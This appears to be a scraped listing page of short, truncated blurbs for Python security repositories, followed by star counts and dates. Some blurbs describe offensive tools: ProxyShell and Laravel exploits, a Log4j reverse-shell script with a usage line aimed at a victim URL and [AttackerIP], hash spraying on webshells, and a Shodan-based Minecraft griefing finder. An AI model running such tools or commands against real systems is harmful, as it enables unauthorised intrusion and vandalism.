Script checks provided domains for log4j vulnerability. A token is created with canarytokens.org and passed as header at request for a single domain. Every token is registered with provided email and the specific domain as note. After the script completes check your email inbox for mails from canarytokens IMPORTANT: have to be used with python3 USAGE: - python3 checkLog4J.py --filepath --email REQUIREMENTS: - requests
RapiDAST RapiDAST provides a framework for continuous, proactive and fully automated dynamic scanning against web apps/API. Its core engine is OWASP Z
Log4j command generator Generate commands for CVE-2021-44228. Description The vulnerability exists due to the Log4j processor's handling of log messag
Surf_Sec Security system to prevent Shoulder Surfing Attacks. REQUIREMENTS: Python 3.6+ XAMPP INSTALLED METHOD TO CONFIGURE PROJECT: Clone the repo to
brute_smb_share I wrote this small PoC after bumping into SMB servers where Hydr
IntarKnife v1.0 a tool can be used in intarnet for easily pentesting moudle hash spray U can use this tool to spray hash on a webshell IntraKnife.exe
GRR Rapid Response is an incident response framework focused on remote live forensics. Build Type Status Tests End-to-end Tests Windows Templates Linu
py_annotation_switch A hack for writing switch statements in type annotations for Python. Why should I use this? You most definitely should not use th
log4check A small Minecraft server to help players detect vulnerability to the Log4Shell exploit 🐚 Tested to work between Minecraft versions 1.12.2 a
tanchi A signature parser for hikari's command handler tanjun. Finally be able to define your commands without those bloody decorator chains! Example
Usage python3 .\exchange-exp.py -------------------------------------------------------------------------------- |
log4j-honeypot-flask Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 This can be
proxyshell-auto usage: proxyshell.py [-h] -t T Automatic Exploit ProxyShell optional arguments: -h, --help show this help message and exit -t T
laravel-exploits Exploit for CVE-2021-3129
scad-build This is a multi-STL OpenSCAD build system based around GNU make. It supports dynamic build targets, intelligent previews with user-defined
Get Security Zones with Scrapli Overview This example will show how to retrieve security zone information on Juniper's SRX firewalls. In addition to t
neo Tool is great one in binary exploitation topic. instead of doing several missions by many tools and windows, you can now automate this in one tool in one session.. Enjoy it
Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At
GriefBuddy This script searches Shodan for Minecraft server IPs to grief. This will return all servers connected to the public internet which Shodan h
boring-flutter A Python r2pipe script to automatically create a Frida hook to intercept TLS traffic for Flutter based apps. Currently only supporting
A tool for removing malicious content from input data before saving data into database. It takes input containing HTML with XSS scripts and returns va
17 Nov 11, 2022
1 Jan 03, 2022
1 Jan 27, 2022
3 Feb 21, 2022
4 Nov 24, 2021
4.3k Jan 05, 2023
6 Oct 17, 2021
4 Dec 23, 2021
11 Nov 17, 2022
76 Nov 09, 2022
144 Nov 19, 2022
93 Jan 05, 2023
228 Nov 25, 2022
1 Dec 21, 2021
2 Jun 19, 2022
4 Oct 10, 2022
16 Mar 24, 2022
26 Dec 29, 2022
64 Oct 18, 2022
2 Jul 05, 2022